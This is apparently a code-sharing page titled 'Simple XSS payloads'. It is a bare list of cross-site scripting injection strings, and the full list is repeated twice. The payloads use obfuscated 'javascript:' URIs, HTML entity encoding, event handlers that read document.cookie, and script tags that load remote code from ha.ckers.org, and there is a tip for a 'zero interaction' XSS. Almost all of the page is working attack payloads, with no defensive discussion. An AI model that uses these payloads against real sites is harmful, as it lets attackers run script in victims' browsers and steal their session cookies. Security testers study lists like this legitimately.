generalistcodes/Simple XSS payloads

## Simple XSS payloads
" onfocus="alert(1)" name="bounty
(Append #bounty to the URL and enjoy your zero interaction XSS )

<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//

# Internet Explorer, Edge
<svg><script>alert(1)<p>

# Firefox

<svg><x><script>alert(1)</x>

# Common

'';!--"<XSS>=&{()}

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert("XSS")>

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

<a onmouseover="alert(document.cookie)">xxs link</a>

<a onmouseover=alert(document.cookie)>xxs link</a>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=# onmouseover="alert('xxs')">

<IMG SRC= onmouseover="alert('xxs')">

<IMG onmouseover="alert('xxs')">

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="jav	ascript:alert('XSS');">

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

<IMG SRC=" &#14;  javascript:alert('XSS');">

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >

<SCRIPT SRC=//ha.ckers.org/.j>

<IMG SRC="javascript:alert('XSS')"

<iframe src=http://ha.ckers.org/scriptlet.html <

\";alert('XSS');//


</TITLE><SCRIPT>alert("XSS");</SCRIPT>


<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')">

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

<IMG SRC='vbscript:msgbox("XSS")'>

<IMG SRC="livescript:[code]">

<BODY ONLOAD=alert('XSS')>
	" onfocus="alert(1)" name="bounty
	(Append #bounty to the URL and enjoy your zero interaction XSS )

	<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//

	# Internet Explorer, Edge
	<svg><script>alert(1)<p>

	# Firefox

	<svg><x><script>alert(1)</x>

	# Common

	'';!--"<XSS>=&{()}

	<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

	<IMG SRC="javascript:alert('XSS');">

	<IMG SRC=javascript:alert('XSS')>

	<IMG SRC=JaVaScRiPt:alert('XSS')>

	<IMG SRC=javascript:alert("XSS")>

	<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

	<a onmouseover="alert(document.cookie)">xxs link</a>

	<a onmouseover=alert(document.cookie)>xxs link</a>

	<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

	<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

	<IMG SRC=# onmouseover="alert('xxs')">

	<IMG SRC= onmouseover="alert('xxs')">

	<IMG onmouseover="alert('xxs')">

	<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

	<IMG SRC=javascript:alert(
	'XSS')>

	<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
	#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

	<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

	<IMG SRC="jav ascript:alert('XSS');">

	<IMG SRC="jav ascript:alert('XSS');">

	<IMG SRC="jav ascript:alert('XSS');">

	<IMG SRC="jav ascript:alert('XSS');">

	<IMG SRC=" javascript:alert('XSS');">

	<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

	<BODY onload!#$%&()*~+-_.,:;?@[/\|\]^`=alert("XSS")>

	<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

	<<SCRIPT>alert("XSS");//<</SCRIPT>

	<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >

	<SCRIPT SRC=//ha.ckers.org/.j>

	<IMG SRC="javascript:alert('XSS')"

	<iframe src=http://ha.ckers.org/scriptlet.html <

	\";alert('XSS');//



	</TITLE><SCRIPT>alert("XSS");</SCRIPT>


	<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

	<BODY BACKGROUND="javascript:alert('XSS')">

	<IMG DYNSRC="javascript:alert('XSS')">

	<IMG LOWSRC="javascript:alert('XSS')">

	<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

	<IMG SRC='vbscript:msgbox("XSS")'>

	<IMG SRC="livescript:[code]">

	<BODY ONLOAD=alert('XSS')>